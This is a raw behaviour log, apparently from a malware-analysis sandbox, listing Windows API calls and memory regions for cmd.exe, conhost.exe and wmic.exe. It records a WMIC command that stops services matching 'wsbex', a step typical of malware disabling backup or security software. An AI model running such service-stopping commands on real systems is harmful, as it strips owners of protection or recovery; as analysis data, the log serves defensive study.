(_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0106.693] SetErrorMode (uMode=0x0) returned 0x0 [0106.693] SetErrorMode (uMode=0x1) returned 0x0 [0106.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x53205d0, lpFilePart=0x513f35c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x513f35c*="Desktop") returned 0x1d [0106.693] SetErrorMode (uMode=0x0) returned 0x1 [0106.693] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0106.693] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.699] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0xffffffff [0106.699] GetLastError () returned 0x2 [0106.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.699] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0xffffffff [0106.699] GetLastError () returned 0x2 [0106.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.700] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0xffffffff [0106.700] GetLastError () returned 0x2 [0106.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.700] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0xffffffff [0106.700] GetLastError () returned 0x2 [0106.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.700] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0x532b220 [0106.700] FindClose (in: hFindFile=0x532b220 | out: hFindFile=0x532b220) returned 1 [0106.700] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0xffffffff [0106.700] GetLastError () returned 0x2 [0106.700] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x513f0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x513f0e8) returned 0x532b220 [0106.700] FindClose (in: hFindFile=0x532b220 | out: hFindFile=0x532b220) returned 1 [0106.700] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0106.700] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0106.700] GetConsoleTitleW (in: lpConsoleTitle=0x513f5dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.701] InitializeProcThreadAttributeList (in: lpAttributeList=0x513f508, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x513f4ec | out: lpAttributeList=0x513f508, lpSize=0x513f4ec) returned 1 [0106.701] UpdateProcThreadAttribute (in: lpAttributeList=0x513f508, dwFlags=0x0, Attribute=0x60001, lpValue=0x513f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x513f508, lpPreviousValue=0x0) returned 1 [0106.701] GetStartupInfoW (in: lpStartupInfo=0x513f540 | out: lpStartupInfo=0x513f540*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.701] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.702] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.702] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.702] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0106.702] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0106.703] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x513f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x513f4dc | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE", lpProcessInformation=0x513f4dc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd34, dwThreadId=0xd38)) returned 1 [0106.709] CloseHandle (hObject=0xa4) returned 1 [0106.709] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.710] GetEnvironmentStringsW () returned 0x5329f38* [0106.710] FreeEnvironmentStringsA (penv="=") returned 1 [0106.710] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0107.686] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x513f474 | out: lpExitCode=0x513f474*=0x0) returned 1 [0107.686] CloseHandle (hObject=0xa8) returned 1 [0107.687] _vsnwprintf (in: _Buffer=0x513f55c, _BufferCount=0x13, _Format="%08X", _ArgList=0x513f47c | out: _Buffer="00000000") returned 8 [0107.687] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0107.687] GetEnvironmentStringsW () returned 0x532b428* [0107.687] FreeEnvironmentStringsA (penv="=") returned 1 [0107.687] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0107.687] GetEnvironmentStringsW () returned 0x532b428* [0107.687] FreeEnvironmentStringsA (penv="=") returned 1 [0107.687] DeleteProcThreadAttributeList (in: lpAttributeList=0x513f508 | out: lpAttributeList=0x513f508) [0107.687] _get_osfhandle (_FileHandle=1) returned 0x3c [0107.687] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0107.689] _get_osfhandle (_FileHandle=1) returned 0x3c [0107.689] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0107.689] _get_osfhandle (_FileHandle=0) returned 0x38 [0107.689] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0107.689] SetConsoleInputExeNameW () returned 0x1 [0107.689] GetConsoleOutputCP () returned 0x1b5 [0107.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0107.689] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.690] exit (_Code=0) Thread: id = 175 os_tid = 0xd30 Process: id = "32" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x461c3000" os_pid = "0xd18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xd10" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2108 start_va = 0x7f583000 end_va = 0x7f583fff entry_point = 0x0 region_type = private name = "private_0x000000007f583000" filename = "" Region: id = 2109 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2110 start_va = 0xc6a4f0000 end_va = 0xc6a50ffff entry_point = 0x0 region_type = private name = "private_0x0000000c6a4f0000" filename = "" Region: id = 2111 start_va = 0xc6a510000 end_va = 0xc6a523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6a510000" filename = "" Region: id = 2112 start_va = 0xc6a530000 end_va = 0xc6a56ffff entry_point = 0x0 region_type = private name = "private_0x0000000c6a530000" filename = "" Region: id = 2113 start_va = 0x7df5ffc50000 end_va = 0x7ff5ffc4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc50000" filename = "" Region: id = 2114 start_va = 0x7ff6c44a0000 end_va = 0x7ff6c44c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44a0000" filename = "" Region: id = 2115 start_va = 0x7ff6c44cd000 end_va = 0x7ff6c44cefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c44cd000" filename = "" Region: id = 2116 start_va = 0x7ff6c44cf000 end_va = 0x7ff6c44cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c44cf000" filename = "" Region: id = 2117 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2118 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2119 start_va = 0xc6a760000 end_va = 0xc6a85ffff entry_point = 0x0 region_type = private name = "private_0x0000000c6a760000" filename = "" Region: id = 2120 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2121 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2122 start_va = 0xc6a4f0000 end_va = 0xc6a4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6a4f0000" filename = "" Region: id = 2123 start_va = 0xc6a500000 end_va = 0xc6a506fff entry_point = 0x0 region_type = private name = "private_0x0000000c6a500000" filename = "" Region: id = 2124 start_va = 0xc6a570000 end_va = 0xc6a62dfff entry_point = 0xc6a570000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2125 start_va = 0xc6a630000 end_va = 0xc6a66ffff entry_point = 0x0 region_type = private name = "private_0x0000000c6a630000" filename = "" Region: id = 2126 start_va = 0xc6a670000 end_va = 0xc6a670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6a670000" filename = "" Region: id = 2127 start_va = 0xc6a680000 end_va = 0xc6a686fff entry_point = 0x0 region_type = private name = "private_0x0000000c6a680000" filename = "" Region: id = 2128 start_va = 0xc6a690000 end_va = 0xc6a690fff entry_point = 0x0 region_type = private name = "private_0x0000000c6a690000" filename = "" Region: id = 2129 start_va = 0xc6a6a0000 end_va = 0xc6a6a0fff entry_point = 0x0 region_type = private name = "private_0x0000000c6a6a0000" filename = "" Region: id = 2130 start_va = 0xc6a9d0000 end_va = 0xc6a9dffff entry_point = 0x0 region_type = private name = "private_0x0000000c6a9d0000" filename = "" Region: id = 2131 start_va = 0xc6a9e0000 end_va = 0xc6ab67fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6a9e0000" filename = "" Region: id = 2132 start_va = 0xc6ab70000 end_va = 0xc6acf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6ab70000" filename = "" Region: id = 2133 start_va = 0xc6ad00000 end_va = 0xc6c0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c6ad00000" filename = "" Region: id = 2134 start_va = 0x7ff6c43a0000 end_va = 0x7ff6c449ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43a0000" filename = "" Region: id = 2135 start_va = 0x7ff6c44cb000 end_va = 0x7ff6c44ccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c44cb000" filename = "" Region: id = 2136 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2137 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2138 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2139 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2140 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2141 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2142 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2143 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2144 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2145 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2146 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2147 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 172 os_tid = 0xd1c Thread: id = 173 os_tid = 0xd20 Thread: id = 174 os_tid = 0xd24 Process: id = "33" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x44781000" os_pid = "0xd34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xd10" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2161 start_va = 0x880000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2162 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2163 start_va = 0x8b0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2164 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2165 start_va = 0x910000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2166 start_va = 0x950000 end_va = 0x953fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 2167 start_va = 0x960000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2168 start_va = 0x970000 end_va = 0x971fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2169 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 2170 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 2171 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2172 start_va = 0x7f0d0000 end_va = 0x7f0f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 2173 start_va = 0x7f0f3000 end_va = 0x7f0f3fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f3000" filename = "" Region: id = 2174 start_va = 0x7f0fa000 end_va = 0x7f0fafff entry_point = 0x0 region_type = private name = "private_0x000000007f0fa000" filename = "" Region: id = 2175 start_va = 0x7f0fd000 end_va = 0x7f0fffff entry_point = 0x0 region_type = private name = "private_0x000000007f0fd000" filename = "" Region: id = 2176 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2177 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2178 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2179 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2180 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2181 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 2182 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2183 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2184 start_va = 0xbf0000 end_va = 0xceffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 2185 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2186 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2187 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2188 start_va = 0x980000 end_va = 0xa3dfff entry_point = 0x980000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2189 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2190 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2191 start_va = 0xb30000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 2192 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2193 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2194 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2195 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2196 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2197 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2198 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2199 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2200 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2201 start_va = 0x77670000 end_va = 0x7775ffff 